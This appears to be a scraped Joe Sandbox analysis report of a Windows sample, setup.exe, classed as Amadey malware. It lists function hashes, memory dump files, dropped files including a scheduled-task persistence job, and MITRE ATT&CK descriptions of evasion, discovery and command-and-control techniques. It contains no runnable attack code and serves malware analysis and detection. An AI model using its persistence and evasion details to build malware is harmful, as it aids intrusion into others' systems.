Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: f86ae5e405dc77ad70e0d2ae75646719710f09f571005315b4c21c10fdf1eabf
Instruction ID: 8bc110ba499ae20b55c15dff298e143331423397f27bdc5e79438d60d326df37
Opcode Fuzzy Hash: f86ae5e405dc77ad70e0d2ae75646719710f09f571005315b4c21c10fdf1eabf
Instruction Fuzzy Hash: AB21417590020AAFEF11EFA4CC459EEBF79FF48714F000065F501A7251DB31AD819BA1

Function 00517040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0051726C

Strings

`zQ, xrefs: 00517282
@.P, xrefs: 00517250

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.P$`zQ
API String ID: 3366076730-1927873245
Opcode ID: d1a537a7082809758919d85946371b0d0998ae909a7d10ac9f05a52f1cb8f525
Instruction ID: de9aa484451bcd22d34504ec1d8309975c32112be78e66fb0e4de069a0589310
Opcode Fuzzy Hash: d1a537a7082809758919d85946371b0d0998ae909a7d10ac9f05a52f1cb8f525
Instruction Fuzzy Hash: EFA138B4A01619CFEB21CFA8C88479EBBF1BF48710F14855AE819AB351D7759D41CF80

Function 0053F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0053F263

Strings

`'V, xrefs: 0053F235
8"V, xrefs: 0053F30B

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"V$`'V
API String ID: 3903695350-3298631664
Opcode ID: 8391b321707d5c56d7c6095f7d2c36cd7d311ba972f144b69481120313b55809
Instruction ID: 43b6596017030249d4f8a00c4d4c443a57ea7c5c8adba2953c509b3c2b9d439d
Opcode Fuzzy Hash: 8391b321707d5c56d7c6095f7d2c36cd7d311ba972f144b69481120313b55809
Instruction Fuzzy Hash: C8312C35A0060ADFDB21AB78DD49B5A7BE9BF80310F145839F496D7192DF75AC808B21

Function 00503930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00503962
__Mtx_init_in_situ.LIBCPMT ref: 005039A1

Strings

pBP, xrefs: 00503940

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pBP
API String ID: 3366076730-43306289
Opcode ID: 2141b03d7980df3ae3e1b570d2a4e52e480b061f1d7c4e9768fd3f6ddbb2b2a1
Instruction ID: b979f8a81575aac92a759035b837313c622e4b52cc4f05af6586fe0dd16127f6
Opcode Fuzzy Hash: 2141b03d7980df3ae3e1b570d2a4e52e480b061f1d7c4e9768fd3f6ddbb2b2a1
Instruction Fuzzy Hash: 0D4136B06017058FD720CF18C58875ABBF5FF84315F108A19E86A8B381E7B5EA05CB80

Function 00502520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00502552

Strings

P#P, xrefs: 00502547
P#P, xrefs: 0050255D

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#P$P#P
API String ID: 2659868963-2445065942
Opcode ID: 1d657bd42b701b763eabb5f6ebb04eb03c72fb95d310d4b9db6c9fc9906ff941
Instruction ID: 98acc6304d946294b0cad7384c8ad9b11b4f36b803bba4b140161893ee9f427d
Opcode Fuzzy Hash: 1d657bd42b701b763eabb5f6ebb04eb03c72fb95d310d4b9db6c9fc9906ff941
Instruction Fuzzy Hash: 26F0A771D1020DABCB14DFA8D8419CEBFF4BF55304F1082AEE84567240EB715B59CB95

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
setup.exe

Function 0050BD60 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 310
networkfileCOMMON

Function 00505DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00507D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00536E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 0053D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Function 005082B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00508A60 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 00536C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00536F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 0053D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON